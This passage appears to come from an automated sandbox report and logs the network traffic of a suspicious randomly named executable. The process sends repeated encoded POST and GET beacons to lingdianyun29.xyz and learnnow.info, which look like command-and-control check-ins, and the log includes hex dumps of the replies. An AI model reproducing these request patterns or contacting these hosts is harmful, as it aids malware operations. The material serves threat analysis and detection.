                                                                Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                Dec 9, 2024 08:46:01.780667067 CET  1236   IN         Data Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                Dec 9, 2024 08:46:01.780755043 CET  224    IN         Data Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                Dec 9, 2024 08:46:01.781383991 CET  1236   IN         Data Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                Dec 9, 2024 08:46:01.781450987 CET  224    IN         Data Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                Dec 9, 2024 08:46:01.898129940 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                Session ID: 30 | Source IP: 192.168.2.12 | Source Port: 49761 | Destination IP: 121.43.155.35 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp: Dec 9, 2024 08:46:03.132781029 CET | Bytes transferred: 825 | Direction: OUT | Data:
                                                                POST /404o/ HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lingdianyun29.xyz
                                                                Referer: http://www.lingdianyun29.xyz/404o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=bIpwujxH1mQxHoHew7RifRxfbtpaBeNeokUgbD4kDPZQS1eF0kQ3QbuwvqZR8+p0mBcqX0rAVhdWBq5zcnpf88u7wZS/FtRTE3DzqnZjwoYI6mkLxZzBzlBGzF5S+bxWKESqXC4U0516GlfQiY8sGnFxBhHtnKecoVJ4wcDtqyb8i1ZTunD0Q6gu4r8G5OVEIlf99sAkfQspEiCr2jq0nts=
                                                                Timestamp: Dec 9, 2024 08:46:04.485342979 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                HTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]


                                                                Session ID: 31 | Source IP: 192.168.2.12 | Source Port: 49762 | Destination IP: 121.43.155.35 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp: Dec 9, 2024 08:46:05.807804108 CET | Bytes transferred: 1838 | Direction: OUT | Data:
                                                                POST /404o/ HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lingdianyun29.xyz
                                                                Referer: http://www.lingdianyun29.xyz/404o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Timestamp: Dec 9, 2024 08:46:07.138952971 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                HTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]


                                                                Session ID: 32 | Source IP: 192.168.2.12 | Source Port: 49763 | Destination IP: 121.43.155.35 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp: Dec 9, 2024 08:46:08.468229055 CET | Bytes transferred: 537 | Direction: OUT | Data:
                                                                GET /404o/?Njld=LDTtwxbX2vi0G&Ebfx6=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsICWCsVDGGe9oFVLx/4b7CRN5YGXwG8= HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Timestamp: Dec 9, 2024 08:46:09.815165997 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                HTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                Dec 9, 2024 08:46:09.815220118 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                Dec 9, 2024 08:46:09.815571070 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                Dec 9, 2024 08:46:09.815638065 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                Dec 9, 2024 08:46:09.816328049 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                Dec 9, 2024 08:46:09.816370964 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                Dec 9, 2024 08:46:09.816914082 CET | 1236 bytes | IN | Data Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                Dec 9, 2024 08:46:09.817003965 CET | 224 bytes | IN | Data Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                Dec 9, 2024 08:46:09.817646980 CET | 1236 bytes | IN | Data Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                Dec 9, 2024 08:46:09.817708015 CET | 224 bytes | IN | Data Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                Dec 9, 2024 08:46:09.934771061 CET | 1236 bytes | IN | Data Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                33 | 192.168.2.12 | 49764 | 199.192.23.123 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:46:25.634076118 CET | 793 | OUT | POST /d5up/ HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.learnnow.info
                                                                Referer: http://www.learnnow.info/d5up/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 70 6e 75 42 52 75 37 35 71 34 67 75 45 4d 66 6a 33 70 41 47 69 43 4b 45 64 6c 57 37 39 68 4d 52 4e 4a 41 44 34 62 63 4e 52 5a 7a 35 76 55 63 41 49 43 4a 4d 59 4b 64 6e 37 74 32 51 77 6f 34 70 75 2f 2f 34 72 32 44 6a 37 7a 34 35 5a 35 42 52 2b 2b 41 57 45 63 35 54 69 34 69 6e 51 56 63 72 70 76 31 70 73 4d 31 35 74 71 44 63 31 73 66 62 65 36 4e 4d 56 72 31 55 71 4d 7a 4d 69 51 47 66 49 6d 64 30 57 54 6b 4b 6c 62 54 64 30 4c 7a 6e 7a 57 43 71 2f 44 7a 53 6e 73 30 4a 31 46 52 58 34 6e 47 39 41 39 77 50 52 2b 73 54 70 75 43 2f 6c 6b 2f 76 77 41 3d 3d
                                                                Data Ascii: Ebfx6=g6EmDrxOULWqpnuBRu75q4guEMfj3pAGiCKEdlW79hMRNJAD4bcNRZz5vUcAICJMYKdn7t2Qwo4pu//4r2Dj7z45Z5BR++AWEc5Ti4inQVcrpv1psM15tqDc1sfbe6NMVr1UqMzMiQGfImd0WTkKlbTd0LznzWCq/DzSns0J1FRX4nG9A9wPR+sTpuC/lk/vwA==
                                                                Dec 9, 2024 08:46:26.853106022 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:26 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                34 | 192.168.2.12 | 49765 | 199.192.23.123 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:46:28.303020954 CET | 813 | OUT | POST /d5up/ HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.learnnow.info
                                                                Referer: http://www.learnnow.info/d5up/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 71 48 2b 42 64 76 37 35 72 59 67 74 64 73 66 6a 35 4a 41 43 69 43 47 45 64 6b 69 4e 36 58 6b 52 4e 6f 77 44 2f 65 6f 4e 57 5a 7a 35 67 45 64 4b 56 53 4a 62 59 4b 51 53 37 6f 57 51 77 6f 73 70 75 38 72 34 72 6c 37 67 71 7a 34 2f 53 5a 42 54 36 2b 41 57 45 63 35 54 69 38 79 65 51 56 45 72 31 50 46 70 76 74 31 36 6b 4b 44 62 6a 38 66 62 4e 71 4e 49 56 72 31 32 71 4e 65 62 69 53 2b 66 49 69 5a 30 58 43 6b 46 38 4c 54 54 36 72 7a 31 38 6a 66 38 6d 53 4c 74 75 2b 38 41 32 6d 4e 54 77 42 4c 6e 66 50 34 5a 45 39 34 65 6b 35 37 50 6f 6e 43 6d 72 46 77 57 76 64 61 4a 2b 38 6f 37 4c 38 50 4f 39 4c 47 58 63 58 41 3d
                                                                Data Ascii: Ebfx6=g6EmDrxOULWqqH+Bdv75rYgtdsfj5JACiCGEdkiN6XkRNowD/eoNWZz5gEdKVSJbYKQS7oWQwospu8r4rl7gqz4/SZBT6+AWEc5Ti8yeQVEr1PFpvt16kKDbj8fbNqNIVr12qNebiS+fIiZ0XCkF8LTT6rz18jf8mSLtu+8A2mNTwBLnfP4ZE94ek57PonCmrFwWvdaJ+8o7L8PO9LGXcXA=
                                                                Dec 9, 2024 08:46:29.526635885 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:29 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                35 | 192.168.2.12 | 49766 | 199.192.23.123 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:46:30.962975025 CET | 1826 | OUT | POST /d5up/ HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.learnnow.info
                                                                Referer: http://www.learnnow.info/d5up/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
